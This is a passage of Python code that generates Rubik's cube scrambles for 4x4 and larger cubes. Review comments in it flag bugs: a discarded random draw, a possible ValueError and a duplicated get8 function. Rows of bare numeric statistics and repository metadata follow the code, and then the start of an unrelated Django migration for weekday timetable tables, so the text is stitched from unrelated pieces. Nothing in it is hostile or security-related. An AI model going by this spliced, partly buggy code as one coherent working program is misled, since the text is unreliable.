                    randmoves1 = random.choice(moves)
                # BUGFIX: this loop previously tested ``randmoves`` (the
                # even-step variable) instead of ``randmoves1``.
                while randmoves1 == "B" and scramble[-4] == "B" and scramble[-2] == "F":
                    randmoves1 = random.choice(moves)
                while randmoves1 == "R" and scramble[-4] == "R" and scramble[-2] == "L":
                    randmoves1 = random.choice(moves)
                while randmoves1 == "L" and scramble[-4] == "L" and scramble[-2] == "R":
                    randmoves1 = random.choice(moves)
                while randmoves1 == "U" and scramble[-4] == "U" and scramble[-2] == "D":
                    randmoves1 = random.choice(moves)
                while randmoves1 == "D" and scramble[-4] == "D" and scramble[-2] == "U":
                    randmoves1 = random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    # ---- phase 2: 25 moves drawn from the wide-turn pool ----
    usedmoves = []
    usedmoves1 = []
    # Seed phase-2 history with the last phase-1 move so the "no
    # immediate repeat" bookkeeping carries over.
    wide_turns.remove(randmoves1)
    usedmoves1.append(randmoves1)
    for i in range(25):
        if i % 2 == 0:
            randmoves = random.choice(wide_turns)
            # One extra draw (not a loop) when the last three moves were
            # all outer-face turns — kept as in the original.
            if randmoves in moves and scramble[-2] in moves and scramble[-4] in moves:
                randmoves = random.choice(wide_turns)
            if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                # NOTE(review): this re-draws from ``moves`` (outer faces
                # only) although the pool here is ``wide_turns``; if the
                # drawn face is currently absent from ``wide_turns`` the
                # remove() below can raise ValueError — confirm intent.
                while randmoves == scramble[-4]:
                    randmoves = random.choice(moves)
            while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                randmoves = random.choice(wide_turns)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            wide_turns.remove(randmoves)
            if i != 0:
                wide_turns.append(usedmoves1[-1])
        else:
            randmoves1 = random.choice(wide_turns)
            if randmoves1 in moves and scramble[-2] in moves and scramble[-4] in moves:
                randmoves1 = random.choice(wide_turns)
            if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                while randmoves1 == scramble[-4]:
                    randmoves1 = random.choice(moves)
            while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                randmoves1 = random.choice(wide_turns)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            wide_turns.remove(randmoves1)
            wide_turns.append(usedmoves[-1])
    return "".join(scramble)
def get5():
    """Return a 60-move 5x5x5 scramble of single and wide face turns."""
    pool = ["F", "Fw", "B", "Bw", "R", "Rw", "L", "Lw", "D", "Dw", "U", "Uw"]
    suffixes = [" ", "2 ", "' "]
    tokens = []
    hist_even = []
    hist_odd = []
    ud_axis = ["U", "D", "Uw", "Dw"]
    rl_axis = ["R", "L", "Lw", "Rw"]
    fb_axis = ["F", "B", "Fw", "Bw"]

    def same_axis(*candidates):
        # True when every candidate move turns around one cube axis.
        for group in (ud_axis, rl_axis, fb_axis):
            if all(c in group for c in candidates):
                return True
        return False

    for step in range(60):
        if step % 2 == 0:
            pick = random.choice(pool)
            if step > 1:
                if same_axis(pick, tokens[-2], tokens[-4]):
                    # Re-roll exact repeats of the move two steps back.
                    while pick == tokens[-4]:
                        pick = random.choice(pool)
                if step > 2:
                    # Re-roll while the last four moves share one axis.
                    while same_axis(pick, tokens[-2], tokens[-4], tokens[-6]):
                        pick = random.choice(pool)
            hist_even.append(pick)
            tokens.append(pick)
            tokens.append(random.choice(suffixes))
            pool.remove(pick)
            if step != 0:
                pool.append(hist_odd[-1])
        else:
            pick = random.choice(pool)
            if step > 2:
                # This second draw discards the first pick; kept as-is to
                # mirror the original behaviour exactly.
                pick = random.choice(pool)
                if same_axis(pick, tokens[-2], tokens[-4]):
                    while pick == tokens[-4]:
                        pick = random.choice(pool)
                while same_axis(pick, tokens[-2], tokens[-4], tokens[-6]):
                    pick = random.choice(pool)
            tokens.append(pick)
            hist_odd.append(pick)
            tokens.append(random.choice(suffixes))
            pool.remove(pick)
            pool.append(hist_even[-1])
    return "".join(tokens)
def get6():
    """Return an 80-move 6x6x6 scramble (face, wide and 3-wide turns)."""
    moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw"]
    turns = [" ","2 ","' "]
    scramble = []
    usedmoves=[]   # moves drawn on even steps
    usedmoves1=[]  # moves drawn on odd steps
    # Axis groups: moves in one list turn around the same cube axis.
    list1=["U","D","Uw","Dw","3Uw"]
    list2=["R","L","Lw","Rw","3Rw"]
    list3=["F","B","Fw","Bw","3Fw"]
    for i in range(80):
        if i % 2 ==0:
            randmoves=random.choice(moves)
            if i>1:
                # If the last three moves share an axis, re-roll exact
                # repeats of the move two steps back.
                if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves==scramble[-4]:
                        randmoves=random.choice(moves)
                if i>2:
                    # Re-roll while the last four moves share one axis.
                    while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                        randmoves=random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1=random.choice(moves)
            if i>2:
                # NOTE(review): this second draw discards the first pick
                # on every odd step after i == 2 — presumably accidental.
                randmoves1=random.choice(moves)
                if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves1==scramble[-4]:
                        randmoves1=random.choice(moves)
                while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                    randmoves1=random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
def get7():
    """Return a 100-move 7x7x7 scramble (up to 3-wide turns, all faces)."""
    moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw"]
    turns = [" ","2 ","' "]
    scramble = []
    usedmoves=[]   # moves drawn on even steps
    usedmoves1=[]  # moves drawn on odd steps
    # Axis groups: moves in one list turn around the same cube axis.
    list1=["U","D","Uw","Dw","3Uw","3Dw"]
    list2=["R","L","Lw","Rw","3Rw","3Lw"]
    list3=["F","B","Fw","Bw","3Fw","3Bw"]
    for i in range(100):
        if i % 2 ==0:
            randmoves=random.choice(moves)
            if i>1:
                # If the last three moves share an axis, re-roll exact
                # repeats of the move two steps back.
                if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves==scramble[-4]:
                        randmoves=random.choice(moves)
                if i>2:
                    # Re-roll while the last four moves share one axis.
                    while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                        randmoves=random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1=random.choice(moves)
            if i>2:
                # NOTE(review): this second draw discards the first pick
                # on every odd step after i == 2 — presumably accidental.
                randmoves1=random.choice(moves)
                if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves1==scramble[-4]:
                        randmoves1=random.choice(moves)
                while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                    randmoves1=random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
def get8():
    """Return a 120-move 8x8x8 scramble (up to 4-wide R/U/F turns)."""
    moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw"]
    turns = [" ","2 ","' "]
    scramble = []
    usedmoves=[]   # moves drawn on even steps
    usedmoves1=[]  # moves drawn on odd steps
    # Axis groups: moves in one list turn around the same cube axis.
    list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw"]
    list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw"]
    list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw"]
    for i in range(120):
        if i % 2 ==0:
            randmoves=random.choice(moves)
            if i>1:
                # If the last three moves share an axis, re-roll exact
                # repeats of the move two steps back.
                if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves==scramble[-4]:
                        randmoves=random.choice(moves)
                if i>2:
                    # Re-roll while the last four moves share one axis.
                    while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                        randmoves=random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1=random.choice(moves)
            if i>2:
                # NOTE(review): this second draw discards the first pick
                # on every odd step after i == 2 — presumably accidental.
                randmoves1=random.choice(moves)
                if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves1==scramble[-4]:
                        randmoves1=random.choice(moves)
                while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                    randmoves1=random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
def get8():
    """Return a 120-move 8x8x8 scramble (up to 4-wide R/U/F turns).

    NOTE(review): this is a byte-for-byte duplicate of the ``get8``
    defined earlier in this file; being defined second, it silently
    shadows the first. Likely a leftover — confirm and remove one.
    """
    moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw"]
    turns = [" ","2 ","' "]
    scramble = []
    usedmoves=[]   # moves drawn on even steps
    usedmoves1=[]  # moves drawn on odd steps
    # Axis groups: moves in one list turn around the same cube axis.
    list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw"]
    list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw"]
    list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw"]
    for i in range(120):
        if i % 2 ==0:
            randmoves=random.choice(moves)
            if i>1:
                # If the last three moves share an axis, re-roll exact
                # repeats of the move two steps back.
                if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves==scramble[-4]:
                        randmoves=random.choice(moves)
                if i>2:
                    # Re-roll while the last four moves share one axis.
                    while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                        randmoves=random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1=random.choice(moves)
            if i>2:
                # NOTE(review): this second draw discards the first pick
                # on every odd step after i == 2 — presumably accidental.
                randmoves1=random.choice(moves)
                if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves1==scramble[-4]:
                        randmoves1=random.choice(moves)
                while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                    randmoves1=random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
def get9():
    """Return a 120-move 9x9x9 scramble (up to 4-wide turns, all faces)."""
    moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw","4Dw","4Lw","4Bw"]
    turns = [" ","2 ","' "]
    scramble = []
    usedmoves=[]   # moves drawn on even steps
    usedmoves1=[]  # moves drawn on odd steps
    # Axis groups: moves in one list turn around the same cube axis.
    list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw","4Dw"]
    list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw","4Lw"]
    list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw","4Bw"]
    for i in range(120):
        if i % 2 ==0:
            randmoves=random.choice(moves)
            if i>1:
                # If the last three moves share an axis, re-roll exact
                # repeats of the move two steps back.
                if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves==scramble[-4]:
                        randmoves=random.choice(moves)
                if i>2:
                    # Re-roll while the last four moves share one axis.
                    while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                        randmoves=random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1=random.choice(moves)
            if i>2:
                # NOTE(review): this second draw discards the first pick
                # on every odd step after i == 2 — presumably accidental.
                randmoves1=random.choice(moves)
                if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves1==scramble[-4]:
                        randmoves1=random.choice(moves)
                while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                    randmoves1=random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
def get10():
    """Return a 120-move 10x10x10 scramble (up to 5-wide R/U/F turns)."""
    moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw","4Dw","4Lw","4Bw","5Rw","5Fw","5Uw"]
    turns = [" ","2 ","' "]
    scramble = []
    usedmoves=[]   # moves drawn on even steps
    usedmoves1=[]  # moves drawn on odd steps
    # Axis groups: moves in one list turn around the same cube axis.
    list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw","4Dw","5Uw"]
    list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw","4Lw","5Rw"]
    list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw","4Bw","5Fw"]
    for i in range(120):
        if i % 2 ==0:
            randmoves=random.choice(moves)
            if i>1:
                # If the last three moves share an axis, re-roll exact
                # repeats of the move two steps back.
                if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves==scramble[-4]:
                        randmoves=random.choice(moves)
                if i>2:
                    # Re-roll while the last four moves share one axis.
                    while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                        randmoves=random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1=random.choice(moves)
            if i>2:
                # NOTE(review): this second draw discards the first pick
                # on every odd step after i == 2 — presumably accidental.
                randmoves1=random.choice(moves)
                if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves1==scramble[-4]:
                        randmoves1=random.choice(moves)
                while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                    randmoves1=random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
def get11():
    """Return a 120-move 11x11x11 scramble (up to 5-wide turns, all faces)."""
    moves = ["F","Fw","B","Bw","R","Rw","L","Lw","D","Dw","U","Uw","3Uw","3Rw","3Fw","3Bw","3Dw","3Lw","4Uw","4Rw","4Fw","4Dw","4Lw","4Bw","5Rw","5Fw","5Uw","5Dw","5Lw","5Bw"]
    turns = [" ","2 ","' "]
    scramble = []
    usedmoves=[]   # moves drawn on even steps
    usedmoves1=[]  # moves drawn on odd steps
    # Axis groups: moves in one list turn around the same cube axis.
    list1=["U","D","Uw","Dw","3Uw","3Dw","4Uw","4Dw","5Uw","5Dw"]
    list2=["R","L","Lw","Rw","3Rw","3Lw","4Rw","4Lw","5Rw","5Lw"]
    list3=["F","B","Fw","Bw","3Fw","3Bw","4Fw","4Bw","5Fw","5Bw"]
    for i in range(120):
        if i % 2 ==0:
            randmoves=random.choice(moves)
            if i>1:
                # If the last three moves share an axis, re-roll exact
                # repeats of the move two steps back.
                if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves==scramble[-4]:
                        randmoves=random.choice(moves)
                if i>2:
                    # Re-roll while the last four moves share one axis.
                    while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                        randmoves=random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1=random.choice(moves)
            if i>2:
                # NOTE(review): this second draw discards the first pick
                # on every odd step after i == 2 — presumably accidental.
                randmoves1=random.choice(moves)
                if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves1==scramble[-4]:
                        randmoves1=random.choice(moves)
                while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                    randmoves1=random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
def get_big_cube(n=12):
    """Return a scramble for an n x n x n cube (default 12).

    The move pool starts with the outer and 2-wide turns and is extended
    with i-wide turns for each layer depth i below the cube's half depth;
    the scramble is n * 15 moves long.
    """
    moves = ["F","B","R","L","U","D","Uw","Dw","Fw","Bw","Rw","Lw"]
    turns = [" ","2 ","' "]
    moveslist = ["F","B","R","L","U","D"]
    scramble = []
    usedmoves=[]   # moves drawn on even steps
    usedmoves1=[]  # moves drawn on odd steps
    ruf=["R","U","F"]
    # Axis groups: moves in one list turn around the same cube axis.
    list1=["U","D","Uw","Dw"]
    list2=["R","L","Lw","Rw"]
    list3=["F","B","Fw","Bw"]
    n1=int(n/2)  # half depth: the deepest distinct wide turn on an even cube
    if n% 2==0:
        times=int(n/2)
    else:
        times=int(n/2)+1
    # Build the wide-turn pool and extend the axis groups to match.
    for i in range(3,times):
        if n % 2==0:
            # NOTE(review): on even cubes this appends the half-depth
            # R/U/F wide turns once per loop iteration, producing
            # duplicates in ``moves`` and the axis lists (which skews the
            # draw weights) — presumably meant to run only once; confirm.
            for ru in ruf:
                moves.append(f"{n1}{ru}w")
                if ru=="R":
                    list2.append(f"{n1}{ru}w")
                elif ru=="U":
                    list1.append(f"{n1}{ru}w")
                elif ru=="F":
                    list3.append(f"{n1}{ru}w")
        for move in moveslist:
            moves.append(f"{i}{move}w")
            if move=="U" or move=="D":
                list1.append(f"{i}{move}w")
            elif move=="R" or move=="L":
                list2.append(f"{i}{move}w")
            elif move=="B" or move=="F":
                list3.append(f"{i}{move}w")
    for i in range(n*15):
        if i % 2 ==0:
            randmoves=random.choice(moves)
            if i>1:
                # If the last three moves share an axis, re-roll exact
                # repeats of the move two steps back.
                if (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves==scramble[-4]:
                        randmoves=random.choice(moves)
                if i>2:
                    # Re-roll while the last four moves share one axis.
                    while (randmoves in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                        randmoves=random.choice(moves)
            usedmoves.append(randmoves)
            scramble.append(randmoves)
            scramble.append(random.choice(turns))
            # Exclude the move just used from the next draw; restore the
            # move used two steps earlier.
            moves.remove(randmoves)
            if i != 0:
                moves.append(usedmoves1[-1])
        else:
            randmoves1=random.choice(moves)
            if i>2:
                # NOTE(review): this second draw discards the first pick
                # on every odd step after i == 2 — presumably accidental.
                randmoves1=random.choice(moves)
                if (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3):
                    while randmoves1==scramble[-4]:
                        randmoves1=random.choice(moves)
                while (randmoves1 in list1 and scramble[-2] in list1 and scramble[-4] in list1 and scramble[-6] in list1) or (randmoves1 in list2 and scramble[-2] in list2 and scramble[-4] in list2 and scramble[-6] in list2) or (randmoves1 in list3 and scramble[-2] in list3 and scramble[-4] in list3 and scramble[-6] in list3):
                    randmoves1=random.choice(moves)
            scramble.append(randmoves1)
            usedmoves1.append(randmoves1)
            scramble.append(random.choice(turns))
            moves.remove(randmoves1)
            moves.append(usedmoves[-1])
    return "".join(scramble)
| 44.83485
| 321
| 0.586606
| 4,725
| 34,478
| 4.276614
| 0.024127
| 0.203048
| 0.093829
| 0.084525
| 0.961004
| 0.952294
| 0.948929
| 0.937101
| 0.926511
| 0.920275
| 0
| 0.057842
| 0.254365
| 34,478
| 768
| 322
| 44.893229
| 0.728178
| 0
| 0
| 0.847892
| 0
| 0
| 0.033759
| 0
| 0.001506
| 0
| 0
| 0
| 0
| 1
| 0.02259
| false
| 0
| 0.001506
| 0
| 0.046687
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1db0d19c1bce670a67423a87f59f9ccad829d2fd
| 5,332
|
py
|
Python
|
timetable/migrations/0001_initial.py
|
Toluhunter/Timetable_management
|
2f7604fb09f23a2ff376b43d34eb92ad9fc726a1
|
[
"Apache-2.0"
] | 1
|
2022-03-03T18:58:40.000Z
|
2022-03-03T18:58:40.000Z
|
timetable/migrations/0001_initial.py
|
Toluhunter/Timetable_management
|
2f7604fb09f23a2ff376b43d34eb92ad9fc726a1
|
[
"Apache-2.0"
] | null | null | null |
timetable/migrations/0001_initial.py
|
Toluhunter/Timetable_management
|
2f7604fb09f23a2ff376b43d34eb92ad9fc726a1
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-11-25 18:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the timetable app.

    Creates one table per weekday (courses_monday .. courses_friday).  The
    five models are structurally identical and differ only in model name and
    db_table; each row ties a course/department/lecturer to a time slot.
    """

    # First migration of this app.
    initial = True

    # Relies on accounts models referenced by the ForeignKeys below
    # (accounts.courses, accounts.department, accounts.lecturer).
    dependencies = [
        ('accounts', '0008_alter_venue_name'),
    ]

    operations = [
        # Wednesday slots -> table courses_wednesday
        migrations.CreateModel(
            name='CoursesWednesday',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): venue is a plain integer, not a ForeignKey to
                # accounts.Venue — presumably intentional; confirm with authors.
                ('venue_id', models.IntegerField(blank=True, null=True)),
                ('class_start_time', models.TimeField(blank=True, null=True)),
                ('class_end_time', models.TimeField(blank=True, null=True)),
                ('course_code', models.ForeignKey(blank=True, db_column='course_code', null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.courses')),
                ('department', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='accounts.department')),
